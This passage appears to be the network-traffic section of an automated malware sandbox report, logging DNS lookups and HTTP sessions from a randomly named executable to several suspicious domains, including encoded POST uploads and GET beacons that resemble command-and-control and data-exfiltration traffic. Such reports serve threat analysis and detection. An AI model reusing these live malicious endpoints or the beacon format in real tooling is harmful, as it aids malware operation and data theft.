                                                                                              Feb 11, 2025 18:53:33.115472078 CET5002080192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:33.131406069 CET5002080192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:33.140554905 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.140569925 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.140574932 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.140898943 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.140908957 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.140918016 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.140927076 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.142426968 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.142438889 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.928595066 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.928662062 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.928730965 CET5002080192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:34.646065950 CET5002080192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:35.665750027 CET5002180192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:35.670546055 CET8050021192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:35.670628071 CET5002180192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:35.679578066 CET5002180192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:35.684442043 CET8050021192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:36.310945988 CET8050021192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:36.310985088 CET8050021192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:36.311134100 CET5002180192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:36.314064026 CET5002180192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:36.318828106 CET8050021192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:41.390476942 CET5002280192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:41.395373106 CET8050022104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:41.397449017 CET5002280192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:41.637118101 CET5002280192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:41.644659996 CET8050022104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:42.064608097 CET8050022104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:42.064634085 CET8050022104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:42.064682007 CET5002280192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:42.065591097 CET8050022104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:42.065633059 CET5002280192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:43.161684990 CET5002280192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:44.180650949 CET5002380192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:44.185468912 CET8050023104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:44.185564995 CET5002380192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:44.200117111 CET5002380192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:44.204960108 CET8050023104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:44.837663889 CET8050023104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:44.837682962 CET8050023104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:44.837739944 CET5002380192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:44.839097977 CET8050023104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:44.839147091 CET5002380192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:46.115058899 CET5002380192.168.2.4104.21.35.208
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Feb 11, 2025 18:52:45.616561890 CET6084453192.168.2.41.1.1.1
                                                                                              Feb 11, 2025 18:52:45.627818108 CET53608441.1.1.1192.168.2.4
                                                                                              Feb 11, 2025 18:53:01.368763924 CET5813853192.168.2.41.1.1.1
                                                                                              Feb 11, 2025 18:53:01.381980896 CET53581381.1.1.1192.168.2.4
                                                                                              Feb 11, 2025 18:53:14.654772043 CET6114053192.168.2.41.1.1.1
                                                                                              Feb 11, 2025 18:53:14.851650000 CET53611401.1.1.1192.168.2.4
                                                                                              Feb 11, 2025 18:53:27.993551016 CET5562753192.168.2.41.1.1.1
                                                                                              Feb 11, 2025 18:53:28.006263018 CET53556271.1.1.1192.168.2.4
                                                                                              Feb 11, 2025 18:53:41.333745003 CET5190453192.168.2.41.1.1.1
                                                                                              Feb 11, 2025 18:53:41.347964048 CET53519041.1.1.1192.168.2.4
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Feb 11, 2025 18:52:45.616561890 CET192.168.2.41.1.1.10x510dStandard query (0)www.cloud-kuprof2.clickA (IP address)IN (0x0001)false
                                                                                              Feb 11, 2025 18:53:01.368763924 CET192.168.2.41.1.1.10xc13bStandard query (0)www.erectus.xyzA (IP address)IN (0x0001)false
                                                                                              Feb 11, 2025 18:53:14.654772043 CET192.168.2.41.1.1.10x50ffStandard query (0)www.fineitemrealm.shopA (IP address)IN (0x0001)false
                                                                                              Feb 11, 2025 18:53:27.993551016 CET192.168.2.41.1.1.10x29e4Standard query (0)www.globalcase.websiteA (IP address)IN (0x0001)false
                                                                                              Feb 11, 2025 18:53:41.333745003 CET192.168.2.41.1.1.10x504cStandard query (0)www.adjokctp.icuA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Feb 11, 2025 18:52:45.627818108 CET1.1.1.1192.168.2.40x510dNo error (0)www.cloud-kuprof2.click57.129.59.27A (IP address)IN (0x0001)false
                                                                                              Feb 11, 2025 18:53:01.381980896 CET1.1.1.1192.168.2.40xc13bNo error (0)www.erectus.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                              Feb 11, 2025 18:53:01.381980896 CET1.1.1.1192.168.2.40xc13bNo error (0)www.erectus.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                              Feb 11, 2025 18:53:14.851650000 CET1.1.1.1192.168.2.40x50ffNo error (0)www.fineitemrealm.shop162.210.195.109A (IP address)IN (0x0001)false
                                                                                              Feb 11, 2025 18:53:28.006263018 CET1.1.1.1192.168.2.40x29e4No error (0)www.globalcase.website192.64.118.221A (IP address)IN (0x0001)false
                                                                                              Feb 11, 2025 18:53:41.347964048 CET1.1.1.1192.168.2.40x504cNo error (0)www.adjokctp.icu104.21.35.208A (IP address)IN (0x0001)false
                                                                                              Feb 11, 2025 18:53:41.347964048 CET1.1.1.1192.168.2.40x504cNo error (0)www.adjokctp.icu172.67.179.147A (IP address)IN (0x0001)false
                                                                                              • www.cloud-kuprof2.click
                                                                                              • www.erectus.xyz
                                                                                              • www.fineitemrealm.shop
                                                                                              • www.globalcase.website
                                                                                              • www.adjokctp.icu
                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.44982057.129.59.27805580C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Feb 11, 2025 18:52:45.649151087 CET453OUTGET /9kj6/?92tD=AVccbOSLL/+N4XgwVpb4SHGSnAGJIc2w8rOLkxaC3AvUfASlWswjdaveGA5SPzmQwtpsnNNz41sXTUjryKzeRTK3cv4i7oHGDeN1DGdqMP4Wc9jKpdKBVJQ=&ODj=aVdxTb HTTP/1.1
                                                                                              Host: www.cloud-kuprof2.click
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Feb 11, 2025 18:52:46.252873898 CET705INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.26.2
                                                                                              Date: Tue, 11 Feb 2025 17:52:46 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 555
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.44991613.248.169.48805580C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Feb 11, 2025 18:53:01.405036926 CET712OUTPOST /cjko/ HTTP/1.1
                                                                                              Host: www.erectus.xyz
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 201
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.erectus.xyz
                                                                                              Referer: http://www.erectus.xyz/cjko/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 36 69 68 54 62 44 55 33 2b 54 4a 33 32 4a 35 66 63 59 41 41 56 57 59 6f 50 62 67 6a 63 67 63 46 39 48 6e 6f 56 6c 6c 35 36 63 58 4e 4f 59 7a 54 46 70 65 59 66 4a 57 66 74 30 4f 4b 53 6f 38 55 41 77 59 38 41 6f 43 45 43 35 64 5a 42 4c 49 4a 31 4d 6a 77 69 2b 54 6e 54 52 38 4f 73 4f 5a 31 63 4f 6d 73 58 7a 43 4d 32 65 4e 4d 66 67 54 6d 63 6c 49 32 50 36 64 61 30 46 78 44 37 53 42 32 31 6d 6f 68 6f 45 76 73 6f 61 72 50 4d 69 66 53 43 43 73 51 4b 50 6c 68 44 2b 38 43 64 47 7a 31 31 74 79 6e 4b 72 4f 62 4a 38 6d 43 44 4e 4e 6b 42 42 4f 75 69 78 43 6f 57 62 69 50 67 4b 54 58 63 41 3d 3d
                                                                                              Data Ascii: 92tD=6ihTbDU3+TJ32J5fcYAAVWYoPbgjcgcF9HnoVll56cXNOYzTFpeYfJWft0OKSo8UAwY8AoCEC5dZBLIJ1Mjwi+TnTR8OsOZ1cOmsXzCM2eNMfgTmclI2P6da0FxD7SB21mohoEvsoarPMifSCCsQKPlhD+8CdGz11tynKrObJ8mCDNNkBBOuixCoWbiPgKTXcA==
                                                                                              Feb 11, 2025 18:53:02.101883888 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                              content-length: 0
                                                                                              connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.44992813.248.169.48805580C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Feb 11, 2025 18:53:03.952903986 CET732OUTPOST /cjko/ HTTP/1.1
                                                                                              Host: www.erectus.xyz
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 221
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.erectus.xyz
                                                                                              Referer: http://www.erectus.xyz/cjko/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 36 69 68 54 62 44 55 33 2b 54 4a 33 30 70 4a 66 62 4c 34 41 54 32 59 72 42 37 67 6a 4f 67 64 4d 39 48 62 6f 56 6b 78 54 36 76 7a 4e 4e 35 44 54 55 59 65 59 65 4a 57 66 34 45 50 4f 66 49 38 50 41 77 45 65 41 70 4f 45 43 35 4a 5a 42 4a 51 4a 31 66 4c 33 77 65 54 6c 4b 68 38 4d 6a 75 5a 31 63 4f 6d 73 58 7a 57 31 32 65 56 4d 66 51 6a 6d 63 42 63 31 48 61 64 5a 31 46 78 44 2f 53 42 79 31 6d 6f 48 6f 46 7a 57 6f 5a 44 50 4d 69 50 53 43 33 41 58 41 50 6b 6f 4d 65 39 48 62 47 47 2b 35 4f 6a 54 58 59 75 63 57 76 2b 6a 47 4c 41 2b 51 77 76 35 77 78 6d 62 4c 63 72 37 74 4a 75 65 48 49 48 6c 30 43 65 66 42 71 31 69 75 7a 37 63 39 42 6f 6c 34 43 4d 3d
                                                                                              Data Ascii: 92tD=6ihTbDU3+TJ30pJfbL4AT2YrB7gjOgdM9HboVkxT6vzNN5DTUYeYeJWf4EPOfI8PAwEeApOEC5JZBJQJ1fL3weTlKh8MjuZ1cOmsXzW12eVMfQjmcBc1HadZ1FxD/SBy1moHoFzWoZDPMiPSC3AXAPkoMe9HbGG+5OjTXYucWv+jGLA+Qwv5wxmbLcr7tJueHIHl0CefBq1iuz7c9Bol4CM=
                                                                                              Feb 11, 2025 18:53:04.506613970 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                              content-length: 0
                                                                                              connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.44994313.248.169.48805580C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Feb 11, 2025 18:53:06.499344110 CET10814OUTPOST /cjko/ HTTP/1.1
                                                                                              Host: www.erectus.xyz
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 10301
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.erectus.xyz
                                                                                              Referer: http://www.erectus.xyz/cjko/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 36 69 68 54 62 44 55 33 2b 54 4a 33 30 70 4a 66 62 4c 34 41 54 32 59 72 42 37 67 6a 4f 67 64 4d 39 48 62 6f 56 6b 78 54 36 76 37 4e 4f 4b 4c 54 46 4c 6d 59 4d 5a 57 66 6b 55 50 44 66 49 39 56 41 77 4d 61 41 70 54 6d 43 39 35 5a 43 6f 77 4a 6b 2b 4c 33 70 75 54 6c 43 42 38 52 73 4f 5a 61 63 49 47 6f 58 7a 47 31 32 65 56 4d 66 53 37 6d 4c 46 49 31 42 61 64 61 30 46 78 48 37 53 42 61 31 6d 52 79 6f 46 32 68 6f 4a 6a 50 4d 44 2f 53 52 78 30 58 4d 50 6b 6d 4a 65 39 68 62 47 61 78 35 49 48 70 58 5a 4b 36 57 70 43 6a 45 63 74 32 56 52 4b 6d 79 58 4b 5a 64 64 7a 47 68 72 75 51 47 71 2f 72 7a 67 57 6e 62 5a 78 64 6a 43 57 7a 67 44 52 6a 75 56 76 5a 53 4a 55 2b 63 67 6a 65 6b 73 61 6f 32 37 30 75 35 51 61 41 41 36 73 50 69 49 78 70 32 59 72 76 35 54 54 47 61 37 55 68 54 68 78 7a 64 66 6b 63 41 69 71 30 4b 45 48 39 6c 48 69 6c 5a 62 76 64 7a 62 4d 34 59 33 4a 75 6f 6c 44 56 36 68 4d 51 67 6f 34 72 4e 42 70 4b 77 70 71 46 31 69 5a 48 69 70 2b 72 56 41 6d 34 72 56 72 68 52 4f 37 61 43 52 56 5a 45 [TRUNCATED]
                                                                                              Data Ascii: 92tD=6ihTbDU3+TJ30pJfbL4AT2YrB7gjOgdM9HboVkxT6v7NOKLTFLmYMZWfkUPDfI9VAwMaApTmC95ZCowJk+L3puTlCB8RsOZacIGoXzG12eVMfS7mLFI1Bada0FxH7SBa1mRyoF2hoJjPMD/SRx0XMPkmJe9hbGax5IHpXZK6WpCjEct2VRKmyXKZddzGhruQGq/rzgWnbZxdjCWzgDRjuVvZSJU+cgjeksao270u5QaAA6sPiIxp2Yrv5TTGa7UhThxzdfkcAiq0KEH9lHilZbvdzbM4Y3JuolDV6hMQgo4rNBpKwpqF1iZHip+rVAm4rVrhRO7aCRVZEquZnapGYmu6UcaoLxyai9Z+ztCdNHMV/r0D+SbT5Sb7e4Lv173UBHGKj3PzQ4GoR3uEa+GeNEkH+uoAv71YtfaxE7TFktvQZSS37Pyv7s/obWOJU8G/2bKjAzg47IodCim22CDrTj+EB6A1FxUElaZ3YdigF3cXzGJW3WsHSkppN2cGJvXfg6Zxz1apdIGyVtFYYjaGZwDvNMwO0yn3ALzhCDpsv+FUE6MX1AWZ6TYVg0lRgnpprVAQgtnKm/d/qz8GoYeIK/8TynSaKHZ9Bjr46E2aop6fBG6Fnyj3CdyOrGd25b6gNjzUlva95oEgKU3NDE37+Tv684Zisuai60rTYmiVVhGpHv1ZOpQ21oMS4JsT3EcqrxOuH42Pbh1grtzIOsUnl3tabevDW+5g9YN8CnloUhcTa2F0Jhuy799MmLQjWAXlaJclAVe1aQiumlQzNUB9Oq1yX3wpKvX1NzMQ9UyB19dtN/Kou6hbS9dRBsZFN51sGSaJDhDoKe3+AN1NG434r/rzTMr+IxTucKBPt4mX2tisXXESh8Jg9bBSjl7ns9ZahlA+ZECKrFIIuHxQyBAMMGadd6D+VCM3OXJZXGMM/pIIM3vKBpClrv012Bib4exbn0LQRn612fn8ABenmw6OFMCeu5KFW5DmNyx4I+AYyIsr+15 [TRUNCATED]


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.44995913.248.169.48805580C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Feb 11, 2025 18:53:09.207825899 CET445OUTGET /cjko/?92tD=3gJzY2hwuTATu+wgM7M2aW4tC9U6eyI05FbsBlp+k+3zOYzda5y9e/SDhnP1PIg0Yh4jO5HOCpt/RLpJrfWBqfOHUxMMiqNoXrahRjaCwOMkcSKIcBEhJK4=&ODj=aVdxTb HTTP/1.1
                                                                                              Host: www.erectus.xyz
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Language: en-US
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Feb 11, 2025 18:53:09.633538008 CET372INHTTP/1.1 200 OK
                                                                                              content-type: text/html
                                                                                              date: Tue, 11 Feb 2025 17:53:09 GMT
                                                                                              content-length: 251
                                                                                              connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 32 74 44 3d 33 67 4a 7a 59 32 68 77 75 54 41 54 75 2b 77 67 4d 37 4d 32 61 57 34 74 43 39 55 36 65 79 49 30 35 46 62 73 42 6c 70 2b 6b 2b 33 7a 4f 59 7a 64 61 35 79 39 65 2f 53 44 68 6e 50 31 50 49 67 30 59 68 34 6a 4f 35 48 4f 43 70 74 2f 52 4c 70 4a 72 66 57 42 71 66 4f 48 55 78 4d 4d 69 71 4e 6f 58 72 61 68 52 6a 61 43 77 4f 4d 6b 63 53 4b 49 63 42 45 68 4a 4b 34 3d 26 4f 44 6a 3d 61 56 64 78 54 62 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?92tD=3gJzY2hwuTATu+wgM7M2aW4tC9U6eyI05FbsBlp+k+3zOYzda5y9e/SDhnP1PIg0Yh4jO5HOCpt/RLpJrfWBqfOHUxMMiqNoXrahRjaCwOMkcSKIcBEhJK4=&ODj=aVdxTb"}</script></head></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.449995162.210.195.109805580C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Feb 11, 2025 18:53:14.874495983 CET733OUTPOST /c3c5/ HTTP/1.1
                                                                                              Host: www.fineitemrealm.shop
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 201
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.fineitemrealm.shop
                                                                                              Referer: http://www.fineitemrealm.shop/c3c5/
                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                                                                              Data Raw: 39 32 74 44 3d 37 56 53 7a 47 38 69 68 64 58 37 63 74 73 30 59 46 36 78 66 65 4a 58 79 4a 75 2b 70 69 58 4b 71 43 74 44 56 73 64 41 6f 47 31 7a 59 32 42 75 55 39 4b 74 49 4f 46 33 41 67 4f 4a 31 33 74 48 31 37 4e 54 4c 56 2f 48 39 52 73 31 78 49 4c 54 6a 64 78 31 66 68 38 78 77 47 42 53 61 79 32 6e 64 59 6d 61 41 71 57 61 71 46 52 73 6a 79 4e 62 47 52 2f 51 37 63 67 6a 79 62 5a 66 30 4c 48 4c 4a 48 57 37 4d 71 77 38 61 31 37 6e 66 6f 75 44 57 6c 71 69 51 50 4b 54 2f 39 54 42 79 30 52 7a 6a 38 65 41 38 33 6b 37 78 63 4b 70 68 61 76 63 4c 6e 69 4e 6f 66 47 7a 62 4a 51 2f 2f 6d 65 65 77 6f 41 3d 3d
                                                                                              Data Ascii: 92tD=7VSzG8ihdX7cts0YF6xfeJXyJu+piXKqCtDVsdAoG1zY2BuU9KtIOF3AgOJ13tH17NTLV/H9Rs1xILTjdx1fh8xwGBSay2ndYmaAqWaqFRsjyNbGR/Q7cgjybZf0LHLJHW7Mqw8a17nfouDWlqiQPKT/9TBy0Rzj8eA83k7xcKphavcLniNofGzbJQ//meewoA==
                                                                                              Feb 11, 2025 18:53:15.333509922 CET886INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 11 Feb 2025 17:53:17 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Last-Modified: Wed, 20 Mar 2024 08:46:13 GMT
                                                                                              ETag: W/"49d-614139f7d9e8f"
                                                                                              Content-Encoding: gzip
                                                                                              Data Raw: 32 34 62 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ad 53 4d 73 da 30 10 bd e7 57 6c 9d b3 11 86 7c 21 8c 67 52 4c a6 9d 49 52 a6 38 93 f6 28 ec 05 6b 2a cb ae b5 c1 d0 4c ff 7b e5 0f 02 99 b6 e9 a5 f2 c1 d2 ee db f7 9e 34 bb fe bb f0 d3 34 fa 3a 9f 41 4a 99 82 f9 c3 fb db 8f 53 70 5c c6 1e 87 53 c6 c2 28 84 2f 1f a2 bb 5b f0 7a 7d 58 50 29 63 62 6c 76 ef 80 93 12 15 9c b1 aa aa 7a d5 b0 97 97 6b 16 7d 66 db 9a c5 ab cb ba ad 6b 9a 9a 5e 42 89 13 9c f8 8d c8 36 53 da 4c fe 40 e0 8d 46 a3 b6 ce a9 41 5c 09 bd 9e 38 a8 1d 78 d9 05 7e 8a 22 09 4e c0 2e 9f 24 29 0c 1e 71 69 24 21 2c 9e 4c 81 3a c1 c4 67 6d a2 05 65 48 02 6a 2d 17 bf 3f c9 cd c4 99 e6 9a 50 93 1b ed 0a 74 20 6e 4f 13 87 70 4b ac d6 1e 43 9c 8a d2 20 4d 1e a2 1b f7 ca 61 c7 44 5a 64 38 71 12 34 71 29 0b 92 b9 3e 62 88 52 69 a0 ea dc a4 c2 c0 12 51 83 d9 db ea bd 30 19 da 29 04 b2 fa 9d 6c 6c 8c d3 e6 ea b5 cc 93 1d 3c af 2c ad 6b e4 0f e4 de 59 b1 b5 a6 72 95 97 fc f4 b2 59 63 68 d2 2b 91 49 b5 e3 a2 94 c2 da ae a9 5c a1 e4 5a f3 d8 1a c2 72 fc [TRUNCATED]
                                                                                              Data Ascii: 24bSMs0Wl|!gRLIR8(k*L{44:AJSp\S(/[z}XP)cblvzk}fk^B6SL@FA\8x~"N.$)qi$!,L:gmeHj-?Pt nOpKC MaDZd8q4q)>bRiQ0)ll<,kYrYch+I\Zr3G1d\K_l_xnp.ky8h_4:%no1($k5^sp\R>likG*\O@h7=A!q`\In+F1IAi7;|S/X<,p5E:}CPX@mtS-clyQ%A()<6>k''0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.450011162.210.195.109805580C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Feb 11, 2025 18:53:17.428348064 CET753OUTPOST /c3c5/ HTTP/1.1
                                                                                              Host: www.fineitemrealm.shop
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US
                                                                                              Cache-Control: no-cache
                                                                                              Content-Length: 221
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Origin: http://www.fineitemrealm.shop
                                                                                              Referer: http://www.fineitemrealm.shop/c3c5/
